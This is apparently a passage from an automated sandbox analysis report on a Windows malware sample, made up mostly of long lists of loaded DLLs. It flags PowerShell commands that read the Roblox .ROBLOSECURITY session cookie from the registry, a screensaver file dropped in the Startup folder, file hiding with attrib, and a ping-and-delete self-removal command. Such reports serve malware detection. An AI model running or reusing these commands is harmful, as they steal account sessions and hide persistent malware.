                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: IDLBk4XMUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: IDLBk4XMUa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: IDLBk4XMUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: IDLBk4XMUa.exeStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF815D push ebx; ret 0_2_00007FFAACCF816A
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCE00BD pushad ; iretd 0_2_00007FFAACCE00C1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB5CE2 push ecx; retn 5F2Eh0_2_00007FFAACEB62DC
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB8167 push ebx; ret 0_2_00007FFAACEB816A
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB4D49 pushad ; ret 0_2_00007FFAACEB4D59
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAACB8D2A5 pushad ; iretd 14_2_00007FFAACB8D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAACD72316 push 8B485F95h; iretd 14_2_00007FFAACD7231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFAACCD109C push E85DB1FBh; ret 18_2_00007FFAACCD10F9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACCE08BD push E958F41Ch; ret 23_2_00007FFAACCE0909
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACCE0875 push E95DB13Ch; ret 23_2_00007FFAACCE0899
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAACCD23DA pushad ; retf 31_2_00007FFAACCD23E1

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJump to dropped file
                        Uses attrib.exe to hide files
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJump to dropped file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJump to dropped file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scrJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scrJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr\:Zone.Identifier:$DATAJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Self deletion via cmd or bat file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
